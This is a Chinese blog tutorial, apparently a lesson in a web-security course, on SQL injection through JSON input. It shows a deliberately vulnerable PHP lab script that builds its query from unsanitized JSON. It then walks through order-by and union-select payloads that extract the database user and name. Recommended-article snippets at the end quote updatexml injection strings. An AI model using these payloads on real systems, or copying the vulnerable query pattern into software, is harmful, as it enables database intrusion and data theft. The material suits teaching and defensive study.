4.7SQL注入之json注入

于 2024-09-04 16:03:52 发布
阅读量233 收藏 6
点赞数 7
分类专栏: web安全 文章标签: sql json 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64177395/article/details/141896474
版权

4.7SQL注入之json注入

本章学习目的:

1.了解什么json数据格式

2.了解json注入的方式

3.了解什么场景下会使用json进行注入

1.什么是json?

JSON(JavaScript Object Notation, JS对象简谱)是一种轻量级的数据交换格式。它基于 ECMAScript(European Computer Manufacturers Association, 欧洲计算机协会制定的js规范)的一个子集,采用完全独立于编程语言的文本格式来存储和表示数据。

json的数据类型:

image.png

创建一个json对象
const jsonStr ='{"name":"mc","age":18,"sex":"男"}'
const jsonObject = JSON.parse(jsonStr);

输出解析json数据
Object.keys(jsonObject).forEach(item=>{console.log(item,":",jsonObject[item])})

转换成json字符串
const toJSON = JSON.stringify(jsonObject);console.log(toJSON);

2.json注入

原理:JSON注入是指应用程序所解析的JSON数据来源于不可信赖的数据源,程序没有对这些不可信赖的数据进行验证、过滤,如果应用程序使用未经验证的输入构造JSON,则可以更改JSON 数据的语义。

危害:
攻击者可以利用JSON注入漏洞在JSON数据中插入元素,从而允许JSO数据对业务非常关键的值执行恶意操作,获取管理权限等
严重的可能导致XSS和动态解析代码

防御:
检查程序逻辑,根据实际需求对数据进行合理过滤和安全校验,以避免产生JSON注使用JSON标准对JSON 数据进行处理,防止JSON注入

3.案例演示

1.php源码:
<?php
  // php防止中文乱码
  header('content-type:text/html;charset=utf-8');
  
  if(isset($_POST['json'])){
    $json_str=$_POST['json'];
    $json=json_decode($json_str);
    if(!$json){
      die('JSON文档格式有误,请检查');
    }
    $username=$json->username;
    //$password=$json->password;
 
    // 建立mysql连接,root/root连接本地数据库
    $mysqli=new mysqli();
    $mysqli->connect('localhost','root','root');
    if($mysqli->connect_errno){
      die('数据库连接失败:'.$mysqli->connect_error);
    }

    // 要操作的数据库名,我的数据库是security
    $mysqli->select_db('security');
    if($mysqli->errno){
      dir('打开数据库失败:'.$mysqli->error);
    }

    // 数据库编码格式
    $mysqli->set_charset('utf-8');

    // 从users表中查询username,password字段
    $sql="SELECT username,password FROM users WHERE username='{$username}'";
    $result=$mysqli->query($sql);
    if(!$result){
      die('执行SQL语句失败:'.$mysqli->error);
    }else if($result->num_rows==0){
      die('查询结果为空');
    }else {
      $array1=$result->fetch_all(MYSQLI_ASSOC);
      echo "用户名:{$array1[0]['username']},密码:{$array1[0]['password']}";
    }

    // 释放资源
    $result->free();
    $mysqli->close();
  }
?>
2.进行注入

1、按照特定的数据格式查询admin用户密码

json={“username”:“admin”}

image.png

2、查看源代码,构造payload

image.png

代码中的sql语句是这个样子的

构造payload进行注入

json={“username”:“admin’ order by 3#”}

3、判断当前数据库有多少列

2正常,3报错,判断当前数据库有2列

4、注入带出来数据

json={“username”:“admin’ and 1=2 union select 1,2#”}

json={“username”:“admin’ and 1=2 union select user(),database()#”}

忆南呦
关注
  • 7
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【mac 安全渗透测试】之SQL注入Demo
LYX_WIN
12-22 3754
一、下载安装sqlmap 1、官网地址:sqlmap: automatic SQL injection and database takeover tool git下载: git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev 2、验证sqlmap安装成功: ./sqlmap.py -v 显示如下日志则说明成功: __H__ ___ ___[)]_____ ___ ___ {1
27.1.1.3 Spark SQL 中ANTLR4的应用
段智华的博客
07-08 6224
27.1.1.3 Spark SQL 中ANTLR4的应用ANTLR是一个强大的解析器生成器,可用于读取,处理,执行或翻译结构化文本或二进制文件。它广泛应用于学术界和工业界,建立各种语言,工具和框架。例如:Twitter搜索使用ANTLR进行查询解析,每天有超过2亿次查询。Hive和Pig语言,Hadoop的数据仓库和分析系统都使用ANTLR。Lex Machina使用ANTLR从法律文本中提取信
Web前端安全问题分类综合以及XSS、CSRF、SQL注入、DoS/DDoS攻击、会话劫持、点击劫持等详解,增强生产安全意识
JINGWHALE
04-22 1567
本文介绍了Web前端安全问题分类综合以及XSS、CSRF、SQL注入、DoS/DDoS攻击、会话劫持、点击劫持等详解,增强生产安全意识。Web前端作为与用户直接交互的界面,其安全性问题直接关系到用户体验和数据安全。近年来,随着前端技术的快速发展,Web前端安全问题也日益凸显。因此,加强生产安全意识,深入理解并防范前端安全问题,对于保障整个Web应用的安全性至关重要。
hive中的SQL执行原理
柳小葱的博客
03-17 1217
Hive 是一个基于 Hadoop 的数据仓库工具,用于处理大规模的结构化和半结构化数据。Hive 的主要目的是提供一种类 SQL 的语言,称为 HiveQL(或 HQL),以便用户可以方便地处理数据,无需编写复杂的 MapReduce 任务。Hive 的基本原理是将 SQL 查询转换为 MapReduce 任务,然后在 Hadoop 上执行这些任务以处理数据。
web渗透入门
baidu_36461925的博客
10-20 1909
目录 工具... 2 攻击类型... 2 SQL注入... 2 Exploit网站及工具... 3 预防SQL注入... 13 攻击类型... 15 跨站点请求伪造... 19 缓存投毒... 20 代码注入... 21 注释注入... 23 Xpath注入... 25 XSS. 27 目录遍历... 29 爆路径... 31 跨用户攻击... 32 会话固定攻击.
apijson与java案例,腾讯开源 APIJSON 连创五个第一
weixin_34304274的博客
04-01 534
腾讯第一个码云推荐项目,// 其它最早创建的是 TencentOS-tiny(码云) 2019.8.23腾讯第一个码云GVP项目,// 其它最早创建的是 TencentOS-tiny(码云) 2019.8.23腾讯码云官方所有项目中Star第一,// 其它最高是 TencentOS-tiny(码云) 272 个Star腾讯所有后端开发项目中Star第一,// 其它最高是 libco(GitHub)...
【漏洞分析】WordPress REST API 内容注入漏洞分析
Anprou的博客
02-08 4068
将WordPress更新到最新版本。
Mybatis_狂神(XML和注解,配置,lombok,动态sql,缓存等)
Java后端技术栈
03-29 1704
狂神说Mybatis视频链接: B站视频 Mybatis官方文档: Mybatis官方文档 MyBatis 1、简介 1.1 什么是Mybatis MyBatis 是一款优秀的持久层框架; 它支持自定义 SQL、存储过程以及高级映射。MyBatis 免除了几乎所有的 JDBC 代码以及设置参数和获取结果集的工作。MyBatis 可以通过简单的 XML 或注解来配置和映射原始类型、接口和 Java POJO(Plain Old Java Objects,普通老式 Java 对象)为数据库
Web漏洞检测及修复
秋天穿秋裤的Blog
07-16 2314
挺全的,建站时候应该一一检测,做安全审查~
struts2.3+spring4.7+hibernamte5.2集成开发环境所需jar包
06-11
在SSH整合中,Hibernate负责数据层的操作,通过SessionFactory和Session对象来执行SQL查询。 在搭建SSH集成开发环境时,你需要包含以下几类jar包: 1. Struts2的核心库:包括struts2-core、struts2-convention-...
SQL经典五十道选刷
m0_67496588的博客
08-31 930
SQL经典五十道选刷
SQL进阶技巧:如何查询最近一笔有效订单? | 近距离有效匹配问题
石榴姐yyds
08-29 252
本文所分析的案例在实际场景中经常被用到,对于支持lag()函数 ignore nulls语法的数据库,本问题就很简单,但对于Hive等数据库不支持该语法时,略会麻烦一些,针对本题我们采用一分为二的方式,对订单有效和无效分开求解,当为有效值时候,利用ag()函数正常求解,当为无效时候,由于会存在多个连续状态一致的,为了能够获取最近有效的状态,我们采用last_value()函数ignore nulls语法来实现,最终通过coalesce()函数将两种状态合并,得到最终的结果。
Python知识点:如何使用SQLAlchemy进行ORM(对象关系映射)
码农超哥的博客
08-31 726
定义数据库表的ORM模型。每个模型类都需要继承自Base,并且通常以类的属性形式定义表的列。
一步迅速了解Spring框架
ymr1843762281的博客
08-28 550
将程序中的一些公共的非业务代码分离提取出来,然后在业务代码执行的时候,给他们横切进来,使用的动态代理的机制实现,在我们的业务代码,不显示调用,但是执行业务代码,会通过代理对象,调用非业务代码。以前我们在程序中需要对象,都是自己new,例如:new StudentDao对象,Spring 是一个轻量级的,IOC 和 AOP 的一站式 Java 开发框架,是为了简化企。除了核心的IOC和AOP功能之外,还对数据访问层,web层都有封装,所以是一站式的。inversion of Control 控制反转。
sql-labs51-55通关攻略
m0_75036923的博客
08-30 993
1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) --+' and updatexml(1,concat(0x7e,(select group_concat(column
在Postgresql中计算工单的对应的GPS轨迹距离
专注GIS软件开发。
08-30 776
在某个App开发中,要求记录用户的日常轨迹,在用户巡逻设备的时,将记录的轨迹点当做该设备巡逻时候的轨迹。由于业务逻辑上没有明确的指示人员巡逻工单-GPS位置之间的关系,所以通过时间关系进行轨迹划定。
【MySQL】索引使用规则——(覆盖索引,单列索引,联合索引,前缀索引,SQL提示,数据分布影响,查询失效情况)
最新发布
YYDsis的博客
08-31 1286
一.索引使用规则 ※.验证索引效率提升 1.覆盖索引——查询使用了索引,并且需要返回的列,在该索引中已经全部能够找到2.单列索引&联合索引3.前缀索引——解决冗长字符串与索引问题【1】前缀索引&索引选择性的介绍【2】前缀索引创建演示:5.SQL提示——指定某个索引/忽略索引/强制索引 6.数据分布影响——MySQL自我评估7.查询失效的几种情况【1】违背——最左前缀法则(联合索引)【2】范围查询右侧失效【3】用or分割开的条件,or后面没索引,所有索引失效【4】索引列上进行运算操作,索引
recovery for sql server 4.7
07-27
SQL Server 4.7是一种用于数据存储和管理的关系型数据库管理系统。它被广泛应用在企业和组织中,用于存储和管理大量的数据。 在使用SQL Server 4.7时,数据恢复是非常重要的。数据恢复是指在数据库系统发生故障或数据丢失时,通过一系列操作恢复数据的过程。SQL Server 4.7提供了强大的恢复功能,以确保数据的可靠性和完整性。 SQL Server 4.7的恢复功能包括事务日志和备份恢复。事务日志记录了所有数据库操作的详细信息,包括插入、更新和删除等操作。当发生故障时,可以通过事务日志来恢复丢失的数据。 备份恢复是指通过定期备份数据库的方式来恢复数据。SQL Server 4.7可以生成完整备份、差异备份和事务日志备份等多种类型的备份。在发生故障时,可以利用备份文件来还原数据库并恢复丢失的数据。 此外,SQL Server 4.7还提供了数据库镜像和复制功能来增加数据的可用性和冗余性。数据库镜像可以将一个数据库实时复制到另一个服务器上,以实现高可用性和灾难恢复。数据库复制允许将数据库的副本复制到其他服务器上,以提高性能和可靠性。 总而言之,SQL Server 4.7提供了强大的数据恢复功能,可以通过事务日志、备份恢复、数据库镜像和复制等方式来保证数据的可靠性和完整性。这些功能对于企业和组织来说至关重要,以确保数据的安全和稳定性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值